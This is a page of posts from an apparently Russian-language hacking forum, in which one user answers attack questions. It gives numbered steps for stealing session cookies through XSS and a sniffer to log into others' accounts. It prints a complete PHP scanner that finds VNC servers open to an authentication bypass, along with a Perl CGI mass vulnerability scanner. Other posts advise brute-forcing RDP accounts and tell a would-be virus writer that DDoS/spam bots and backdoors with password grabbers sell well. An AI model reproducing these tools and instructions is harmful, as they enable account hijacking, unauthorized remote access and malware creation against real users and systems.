Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 ... 35 36 37 38 39 40 41 42 43 44 45 След.
Может это большая дыра?, Хостинг
 
Скорее речь идёт о правах доступа, нежели исп. fopen (кстати на некотрых хостингах исп.старый пхп, где она не включена в пакет).
[ Закрыто] Видео смерти античата., Дефейс античат = смерть
 
Соц.инженерия и XSS -не стоит того, чтобы так выпиющи об этом разглагольствовать, хотя бы по той причине, что существуют недокументированные атаки на различные сетевые сервисы (было бы что смотреть). Ни один ресурс на 100% не защищён от подобного.
Вход на сайт под чужим ником
 
Ищи XSS на сайте. Руководствуясь:
1) ha.ckers.org/xss.html

Либо (нежелательно) - сканнерами для аудита безопасности вроде Webinspect'a.

2) Инжектируй в XSS линк на сниффер.
3) Сниффер удобный существует на http://antichat.ru , а так же ты можешь сделать такой сам, воспользовавшись паблик-скриптом PHP Sniffer. Примеров таковых масса.
4) Импортируй куки и входи в аккаунт.
Конгресс США примет закон об обязательном хранении журналов доступа к
 
американская privacy полетела.....)
Помогите с брутфорсом
 
http://www.web-hack.ru/download/index.php?case=2
Банокматы, система?
 
Если я не ошибаюсь , то ОС как правило зависит от типа банкомата, т.к. у всех по разному, встречалась и 2000 на POS-терминале один раз в магазе. Их же несколько типов, к примеру BSN - почти всегда на XP Professional, Standard Chartered - Windows NT Workstation.
Hack VNC, под Windows
 
Зачем ломать такой журнал?) BHC - оригинальностью хотя бы отличается.

Касательно VNC:
http://cup.su/releases/vnc.txt
Сканнер бажных VNC на PHP. Удобно запускать с шелла.

Код
<?php

/**
 Made by gemaglabin ; underwater.cup.su
 Respectz : SkvoznoY,Bug(0)r,ZaCo,FUF,Cash
 #aol on ru.dal.net ; cup.su and antichat.ru
 try to connect vulnerable hosts with Bl4ck-VNC-Viewer
 milw0rm.com/exploits/1791
*/
  
# configure
define ( '_HELLO_PACKET', '524642203030332E3030380A');
set_time_limit(0);
ini_set("display_errors","0");

# loging...
function tpl_process($title,$color)
{
return <<<HTML
 <SCRIPT>
 with(document.getElementById('logarea'))
  {
   str = "$title";
   col = "$color"
   str = '<FONT FACE=TAHOMA><FONT SIZE=2><FONT COLOR=' + col + '>' + str + '</FONT></FONT></FONT>';
   innerHTML += innerHTML ? "<BR>\\n" + str : str;
    scrollTop += 14;
  }
  </SCRIPT>
HTML;
}


# main function
function Scan_Server ($aserver,$aport )
{ 
 global $fsock;
 $fsock  = fsockopen($aserver,(int) $aport,$errnum,$errstr,2 );
 if ($fsock) 
 {
  $res      = false;
  fread( $fsock,10 );
  # sending first packet named hello 
  $request  = pack("H*",_HELLO_PACKET);
  fwrite    ( $fsock,$request ); 
  fread( $fsock,10 );
  # sending second packet where we try to ayth without pass
  $request  = pack("H*","01");
  fwrite    ( $fsock,$request ); 
  # parsing responce for our auth packet
  $answer = fread( $fsock,10 );
  $answer = unpack("H*",$answer);
  if ($answer[1] = "00000000") $res = true;
  fclose ($fsock);
 }
 return $res;
}
 
  /**
SENDING HELLO PACKET 
0x0000   00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00   .PЛ.3T..a[Ж”..E.
0x0010   00 5E C3 9B 00 00 DE 2F-09 B8 C0 A8 7C 63 0A 0A   .^&#8730;Ы..ё/.Єј®|c..
0x0020   C8 07 30 81 88 0B 00 3A-12 D6 00 00 38 98 00 00   ».0БИ..:.&#247;..8Ш..
0x0030   3B 18 FF 03 00 21 45 00-00 36 C3 9A 40 00 DE 06   ;.?..!E..6&#8730;Ъ@.ё.
0x0040   0C 8C 0A 07 FF FE 51 38-71 5D 09 BC 17 0C 01 B9   .М..?юQ8q].Љ...є
0x0050   1A B2 36 C6 DA 55 50 18-FF F3 27 D7 00 00 52 46   .&#8804;6&#8710;ЏUP.?у'„..RF
0x0060   42 20 30 30 33 2E 30 30-38 0A 0D 0A               B 003.008...
 */ 
 
 /**
SENDING AUTH PACKET
0x0000   00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00   .PЛ.3T..a[Ж”..E.
0x0010   00 51 DC A8 00 00 DE 2F-F0 B7 C0 A8 7C 63 0A 0A   .Q№®..ё/рЈј®|c..
0x0020   C8 07 30 81 88 0B 00 2D-12 D6 00 00 3F 8E 00 00   ».0БИ..-.&#247;..?О..
0x0030   42 1A FF 03 00 21 45 00-00 29 DC A7 40 00 DE 06   B.?..!E..)№І@.ё.
0x0040   F3 8B 0A 07 FF FE 51 38-71 5D 0A 58 17 0C F3 50   уЛ..?юQ8q].X..уP
0x0050   85 8C 0F 43 D7 EF 50 18-FF F1 60 CA 00 00 01      ЕМ.C„пP.?с` ...
 */
 
 /**
VULNERABLE SERVER
0x0000   00 04 61 5B 86 D3 00 50-8B 0D 33 54 08 00 45 00   ..a[Ж”.PЛ.3T..E.
0x0010   00 54 EC D9 00 00 FA 2F-C4 83 0A 0A C8 07 C0 A8   .Tмў..ъ/&#402;Г..».ј®
0x0020   7C 63 30 81 88 0B 00 30-40 00 00 00 42 1B 00 00   |c0БИ..0@...B...
0x0030   3F 8E FF 03 00 21 45 00-00 2C 21 84 40 00 6B 06   ?О?..!E..,!Д@.k.
0x0040   21 AD 51 38 71 5D 0A 07-FF FE 17 0C 0A 58 0F 43   !&#8800;Q8q]..?ю...X.C
0x0050   D7 EF F3 50 85 8D 50 18-FF F2 61 C5 00 00 00 00   „пуPЕНP.?тa&#8776;....
0x0060   00 00                                             ..
 */
 
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HEAD>
<TITLE>VNC Auth Bypass Scaner &nbsp;&nbsp;&nbsp;&nbsp;cup.[su]</TITLE>
<STYLE TYPE="TEXT/CSS">
body{
   overflow: auto;
}

input, select, div {
   font: 11px tahoma, verdana, arial;
}
input.text, select {
   width: 100%;
}
fieldset {
   margin-bottom: 4px;
}

#header {
        font-size: 9px; 
        color: white; 
        padding: 4px;  
        background-color: #7A96DF;  
        font-family: tahoma;
        text-vertical: center;
}

</STYLE>
</HEAD>

<BODY BGCOLOR=#ECE9D8 TEXT=#000000>
<form name="check" method="post" action="?go">
<div style="background-color: #F4F3EE; margin: auto; border: 1px solid #919B9C; width: 318px;">
<div id="header">  
<a href="http://cup.su" style="color: white; text-decoration: none; font-weight: bold; background-color: #7A96DF;">
VNC Auth Bypass Scaner &nbsp;&nbsp;&nbsp;&nbsp;cup.[su]
</a>    
</div> 
<div style="background-color: #F4F3EE; width: 300px; font-size:11px; border: 1px solid #919B9C; margin: 4px; padding:4px;">
<td><textarea style="width: 297px; height: 300px; border: 1px solid #919B9C;WRAP:soft;" name="servers"></textarea></td><br><br>
<DIV ID=logarea STYLE="width: 97%; height: 140px; border: 1px solid #7F9DB9; padding: 3px; overflow: auto"></DIV></td>
</tr> 
<tr>
<td></td>
<tr>
<td></td>
<br>
<td><input class="text" type="submit" Value="Scan servers" style="width: 299px; margin: auto;"/></td>
</tr> 
</tr> 
</table>
</div>   
</div>      
</form>
</BODY>

<?php

if (isset($_POST['servers']))
{
 $_servers = $_POST['servers'];
 $servers  = explode("\r\n",$_servers);
 for ($i=0;$i<count($servers);$i++)
 {
   $host = $servers[$i];
   $port = "5900";
   $vuln = Scan_Server($host,$port);
   if (!$vuln) echo tpl_process("<b>$host is not vulnerable</b>","red");
   else echo tpl_process("<b>$host is vulnerable</b>","green");
 }
}

?> 
Взлом 4dk.ru
 
Ну баги межсайтого скриптинга находятся обычным сканером, Webispect в руки.  

От себя хотел бы посоветовать:

- http://4dk.ru/information/structure/ проверьте на устойчивость пасса.
Отснифайте запрос HTTP Analyzer'oм

- скрипт фидбека на зафлуживания владельца мыла.
DMN CGI-Scanner (Автоматизированный сканер CGI-скриптов), Help
 
Про неактуальность - допустим, сканнер действительно определил уязвимости, хотя бы по имеющейся базе. По идее убедись в результатах найденного, для примера можешь кинуть то , что ты насканил.

Кстати вот пример простейшего опен-сорц PERL CGI сканнера уязвимостей, базу которого ты можешь пополнять:

Код
#!/usr/bin/perl
#
# This is a ordinary CGI scanner, the only
# differance is that it read CGI vulns from
# a database file which can be used to your
# advantage if would like to scan for certain
# CGI flaws you can put it in a file and the 
# scanner would attemp them. 
#
# syntax:
# 
#  -p    :  specifies port.
#  -h    :  specifies host.
#  -d    :  specifies what file should be used as database.
#  -m    :  specifies if the scanner should mass scan.
#  -l    :  specifies if the scanner should log the scan.
#
# Example:
#
# perl cscan.pl -p 80 -h 127.0.0.1 -d cgi.database -l blah.log : Example of single scan
# perl cscan.pl -p 80 -m 127.0.0.1-255 -d cgi.database -l blah.log : Example of mass scan
#
# if -d is specified with out a database file it will use defualt db.
#
# That pretty much somes it up. Enjoy!
#
# Greets: NtWaK0, izik, sagi, Psydal, v0id, websk8ter, BrainStorm
#         RobBbot, GhQst, cr0n, NicotineX, omnis, skills, manipulat0r;
#         CraiK, antisane, JW23, Pneuma, wyze1, w3stside, ES!, *uNF*
#
# For more advance CGI scanning I recommend using 'Whisker' by rfp
# its a nice and powerfull.
#
# Any comments or improvements mail me. Btw I thought I would write
# a nice decent looking code. =P
# Seelan@comstat.co.za
# Iceburg.
# ComStat Security.
# Http://secruity.comstat.co.za - Http://www.comstat.co.za

use Socket;
use Getopt::Std;
getopts("p:h:d:l:m:", \%args);

print "::::::::::::::::::::::::::::::::::::::::\n";
print ":: Cscan.pl - CGI scanner by Iceburg  ::\n";
print "::          ComStat Security          ::\n";
print "::   http://security.comstat.co.za    ::\n";
print "::::::::::::::::::::::::::::::::::::::::\n";

if (!defined $args{h} && !defined $args{m}) {
print qq~

 -p    =  specifies port.
 -h    =  specifies host.
 -d    =  specifies what file should be used as database.
 -l    =  specifies if the scanner should log the scan.
 -m    =  specifies if the scanner should mass scan.

Check the script for Example scans.
~; exit;}

$log=0;
$port=$args{p};

if (defined $args{d}) {
if ($args{d} != 0) { $file = "cgi.ls"; }
else { $file=$args{d} }
open(DB, $file) || die "Can't open database.";
@cgilist = <DB>;
close (DB);
}

if (defined $args{l}) {
$log=1;
open(LOG, ">>$args{l}") || die "Cannot open log file.";
print LOG <<EOT
::::::::::::::::::::::::::::::::::::::::
:: Cscan.pl - CGI scanner by Iceburg  ::
::          ComStat Security          ::
::   http://security.comstat.co.za    ::
::::::::::::::::::::::::::::::::::::::::
EOT
;}


if (defined $args{h}) {
$host=$args{h};
&start;
}

if (defined $args{m}) {
$host = $args{m};
($s,$e) = split(/-/,$host);
($ia, $ib, $id, $ix) = split(/\./,$s);
print "Scaning from $s to $ia.$ib.$id.$e\n";
for($i=$ix; $i<=$e; $i++)
{
$host = "$ia.$ib.$id.$i";
&start
 }
}


sub start {
        print "\n Now scanning $host\n\n";
        if ($log) {print LOG "\n Now scanning $host\n\n";}
        foreach $cgilist (@cgilist)
{

        chomp $cgilist;
        print "Scanning - $cgilist :: ";
        $sl=$cgilist;
        &scan;
        }
}


sub scan {

my($iaddr,$paddr,$proto);

$iaddr = inet_aton($host) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,"GET $sl HTTP/1.0\r\n\r\n",0);

   $check=<SOCK>;
   ($http,$code,$blah) = split(/ /,$check);
        if($code == 200)
   {
                print "Found!\n";
                if ($log) {print LOG "$sl - Found!\n";}
   }
   else
   {
                print "Not Found!\n";

   }
        close(SOCK);
}

sub error
{
$error = shift(@_);
print "Error - $error\n";
exit;
} 
Нужны деньги, написал вирус, проблема у меня
 
К сожалению реальной чёрной инет.индустрии действительно нужны системы RAT и вирусы. Немного другой направленности только... Отнести друзьям - заработаешь на пиво
Сканер уязвимостей
 
Вы говорите действительно актуальные вещи, либо просто те, которые называются стандартно?

- Webinspect
- N-stealth
- Acunetix
Нужны деньги, написал вирус, проблема у меня
 
Если ты ринулся в вирусописатели, на сегодняшний день актуальны боты (ddos/spam).
Бекдоры - если только испольщующие хайдинг, без пассграббера оно мало кому надо. Должна поддерживаться статистика ответов с удалённых заражённых машин.
Взлом сайта, что с этого можно поиметь?
 
Зачем делать, не ориентируюсь самостоятельно(!) в правовых аспектах?

272

Но уверен, что с "кулютарными" подходами - вас обойдёт это стороной)
Исследование безопасности Интернет браузеров в 2006 году
 
По-мойму дело вкуса. Lynx почему-то никто не назвал, а быть может сидит человек и думает зачем гуйщина нужна. Собственно, во всех названных находились переполнения (старо, но всё же), в тему, что не всё так идеально.
Банокматы, система?
 
OS/2 совместимая ось.

GRPS звонилка на борту так же присутствует.
Где узнать
 
Изучить это конкретно под Windows в наиболее доступном языке: http://www.cultdeadcow.com/cDc_files/cDc-351/

По русски - http://www.lib.ru/SECURITY/overflow.txt
Крэкинг, Кто меня просветит как ломать ключики в программах ?
 
После получения основ дизассемблирования советую поглядеть материал по прохождению различных крек-ми на hunger.ru
ДОСТУП К НЕРАСШАРЕНЫМ ПАПКАМ ПО СЕТИ, ОЧЕНЬ ВАЖНО
 
Рад, что вопрос решился, но всё же.

VNC,radmin, другие утилиты для RA - работают по клиент-серверной технологии.
Это говорит о том, что для того, чтобы удалённо управлять машиной, на неё требуется предварительно установить сервер софтерного пакета, который вы выбрали. По поводу пасса админа, как установить сервер - индивидуально.

Если же удалённо поднят RDP - через клиент подключения к терминалам  c:\windows\system32\mstsc.exe. К слову аккаунт на терминал - можно брутить.
Как реально защитить информацию?
 
Если речь идёт о том, что я подумал, существует готовый продукт, совмещающий в сети множество функций, в том числе и при работе с общими ресурсами посредством модуля управления ресурсами. Существует опция тревоги.  Пытаюсь развить идею о централизации конфиденциальных данных на сервере, а среди персонала усилить политику безопасности.

Zserver Suite.
Израиль набирает добровольцев для ведения информационной войны в Интер
 
Интересное решение. Результата только...)
Страницы: Пред. 1 ... 35 36 37 38 39 40 41 42 43 44 45 След.